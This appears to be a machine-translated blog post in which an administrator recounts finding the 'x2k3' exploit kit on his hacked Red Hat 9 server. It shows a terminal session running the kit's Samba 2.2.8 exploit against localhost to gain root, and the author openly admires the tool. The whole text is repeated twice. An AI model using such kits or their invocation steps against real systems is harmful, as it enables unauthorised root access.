Judging from the recent security analysis of hacked servers, I found a tool for this user to increase permissions. He took advantage of Samba's security vulnerability to improve it for ROOT.
In the past few days, the server has been installed on the public network for testing. The next day, I found that the server was hacked
Samba is the default version on Redhat Linux 9. Use the hacker's powerful exploit tool to improve for root.
It only takes 3 seconds to improve to root
Sweat one by one
Find a directory of x2k3 from the server's tmp
[bob@learnin9 tmp]$ cd x2k3/
[bob@learnin9 x2k3]$ ls
bind ftp gkr identd r00t samba
[bob@learnin9 x2k3]$
bind ftp gkr identd samba are all directories, and r00t is a program. Let’s take a look at the execution of r00t program.
[bob@learnin9 x2k3]$ ./r00t
.--------------------------------.
| x2k3 /
| Written by Natok /
+------------------------+----.
| Targets: [1] Samba | <= 2.2.8
| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1
| [3] gkrellmd | <2.1.12
| [4] wu_ftpd | <=2.6.1
| [5] identd | 1.2
+------------------------+----.
| /
|____________________________/
./r00t
[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
[*] Range to scan : 127.0.0.0
[*] Socket Connecting to port : 139
[*] Press control+c for skipping !
Port 139 IP 127.0.0.0 -> Connection refused!
Port 139 IP 127.0.0.1 -> Connection ok!
[+] Let's sploit ;-)
samba-2.2.8 < remote root exploit by eSDee (|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Using ret: [0xbffff6a0]
+ Using ret: [0xbffff574]
+ Using ret: [0xbffff448]
+ Using ret: [0xbffff31c]
+ Using ret: [0xbffff1f0]
+ Using ret: [0xbffff0c4]
+ Using ret: [0xbfffef98]
+ Using ret: [0xbfffee6c]
+ Using ret: [0xbfffed40]
+ Using ret: [0xbfffec14]
+ Using ret: [0xbfffeae8]
+ Using ret: [0xbfffe9bc]
+ Using ret: [0xbfffe890]
+ Using ret: [0xbfffe764]
+ Using ret: [0xbfffe638]
+ Using ret: [0xbfffe50c]
+ Using ret: [0xbfffe3e0]
+ Using ret: [0xbfffe2b4]
+ Using ret: [0xbfffe188]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
See it. It was easily taken as root.
This is just the localhost method, and in fact, the remote is also directly obtained as root.
Please take a look at your Redhat 9. rpm -qa |grep *** Is the sweat already coming out?
There are also overflow programs such as bind gkrellmd wu_ftpd identd. I don't know if these programs belong to some overflow programs that have not been published in the hacking industry. hehe!
Because my server did not start Bind, gkrellmd, wu_ftpd, and identd, it only started the default installation of samba, and it was on the public network, so the hacker won the prize and hacked into my server. It's a pleasure to congratulate me, I finally found such a good tool.
Have a little joy in yourself. I went to check it out/I found that it was a Chinese website. Who is it? Very curious......
It can be said that the r00t program was written by Natok, but the exploit program was not written by him. He just classified other overflow programs. It has made a friendly interface, but it is still very powerful to collect it.
Hope to get to know this guy!
In the past few days, the server has been installed on the public network for testing. The next day, I found that the server was hacked
Samba is the default version on Redhat Linux 9. Use the hacker's powerful exploit tool to improve for root.
It only takes 3 seconds to improve to root
Sweat one by one
Find a directory of x2k3 from the server's tmp
[bob@learnin9 tmp]$ cd x2k3/
[bob@learnin9 x2k3]$ ls
bind ftp gkr identd r00t samba
[bob@learnin9 x2k3]$
bind ftp gkr identd samba are all directories, and r00t is a program. Let’s take a look at the execution of r00t program.
[bob@learnin9 x2k3]$ ./r00t
.--------------------------------.
| x2k3 /
| Written by Natok /
+------------------------+----.
| Targets: [1] Samba | <= 2.2.8
| [2] Bind | 8.3.2 / 8.3.3 / 9.2.1
| [3] gkrellmd | <2.1.12
| [4] wu_ftpd | <=2.6.1
| [5] identd | 1.2
+------------------------+----.
| /
|____________________________/
./r00t
[bob@learnin9 x2k3]$ ./r00t 127.0.0.1 1
[*] Range to scan : 127.0.0.0
[*] Socket Connecting to port : 139
[*] Press control+c for skipping !
Port 139 IP 127.0.0.0 -> Connection refused!
Port 139 IP 127.0.0.1 -> Connection ok!
[+] Let's sploit ;-)
samba-2.2.8 < remote root exploit by eSDee (|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Using ret: [0xbffff8f8]
+ Using ret: [0xbffff7cc]
+ Using ret: [0xbffff6a0]
+ Using ret: [0xbffff574]
+ Using ret: [0xbffff448]
+ Using ret: [0xbffff31c]
+ Using ret: [0xbffff1f0]
+ Using ret: [0xbffff0c4]
+ Using ret: [0xbfffef98]
+ Using ret: [0xbfffee6c]
+ Using ret: [0xbfffed40]
+ Using ret: [0xbfffec14]
+ Using ret: [0xbfffeae8]
+ Using ret: [0xbfffe9bc]
+ Using ret: [0xbfffe890]
+ Using ret: [0xbfffe764]
+ Using ret: [0xbfffe638]
+ Using ret: [0xbfffe50c]
+ Using ret: [0xbfffe3e0]
+ Using ret: [0xbfffe2b4]
+ Using ret: [0xbfffe188]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux learnin9 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=99(nobody)
id
uid=0(root) gid=0(root) groups=99(nobody)
See it. It was easily taken as root.
This is just the localhost method, and in fact, the remote is also directly obtained as root.
Please take a look at your Redhat 9. rpm -qa |grep *** Is the sweat already coming out?
There are also overflow programs such as bind gkrellmd wu_ftpd identd. I don't know if these programs belong to some overflow programs that have not been published in the hacking industry. hehe!
Because my server did not start Bind, gkrellmd, wu_ftpd, and identd, it only started the default installation of samba, and it was on the public network, so the hacker won the prize and hacked into my server. It's a pleasure to congratulate me, I finally found such a good tool.
Have a little joy in yourself. I went to check it out/I found that it was a Chinese website. Who is it? Very curious......
It can be said that the r00t program was written by Natok, but the exploit program was not written by him. He just classified other overflow programs. It has made a friendly interface, but it is still very powerful to collect it.
Hope to get to know this guy!